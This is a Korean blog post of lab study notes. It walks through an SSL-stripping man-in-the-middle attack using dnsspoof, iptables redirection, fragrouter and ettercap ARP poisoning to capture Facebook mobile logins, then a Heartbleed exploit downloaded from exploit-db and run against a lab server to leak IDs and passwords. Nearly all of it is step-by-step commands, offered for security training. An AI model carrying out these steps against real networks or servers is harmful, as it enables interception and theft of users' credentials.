본문 바로가기

INFOSEC/ NETWORK

SSL Strip

SSL Strip : 보안통신을 평문통신으로 변조

일반 브라우저에 입력

http://m.facebook.com 을 입력 https://m.facebook.com 으로 변환된다.


# vi dns.hosts

 

# dnsspoof -f ./dns.hosts


# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# ifconfig eth0 promisc

# ifconfig 명령어로 promisc  모드 확인

 

# fragrouter -B1

# ssl -l 10000


etthercap -G > unified sniffing > hosts:host list >

 

etthercap -G

 

Hosts-Scan for Hosts 로 호스트 IP 리스트 가져오기

add target 1 : 2008

add target 2 : GW

Mitm - arp poisoning (두 개 다 체크 하기)

start > start sniffing

 


2008에서

# ping m.facebook.com

했을 때 칼리 주소 뜨면 스니핑 된 것

 

 

2008에서 http://m.faceboo.com 으로 접속해서 로그인 시도해보면

칼리에서 패킷을 볼 수 있다. 로그인한 내용을.

 


HeartBleed

 

APM 웹 사이트 켜주고,

 

root@kali:~# wget https://www.exploit-db.com/download/32745 -O heartbleed.py

root@kali:~# chmod 755 heartbleed.py

 

# python heartbleed.py 200.200.200.149 (<- 웹페이지 주소)

코드만 실행시켰을 뿐인데, 아이디랑 패스워드가 뜨는 것을 확일할 수 있다.

 

 

 

 

PAYLOAD 값이 최대값을 넘어가서 뒤에 있는 내용까지 다 가져오게끔.

예를 들어, hello 라고 쳤으면, 글자수만큼만 5바이트만 응답해줘야하는건데, 16384바이트만큼 다 가져오게 해서

서버의 내용들을 볼 수 있게한다.

 


 

 

 

 

 

'INFOSEC > NETWORK' 카테고리의 다른 글

VPN (가상 사설망)  (0) 2019.11.14
WAPPLES 실습 (Stored XSS / CSRF / File Upload 공격 차단)  (0) 2019.11.13
Web Application  (0) 2019.11.07
SQL Injection Vector (WebTest)  (0) 2019.11.04
SSL  (0) 2019.10.21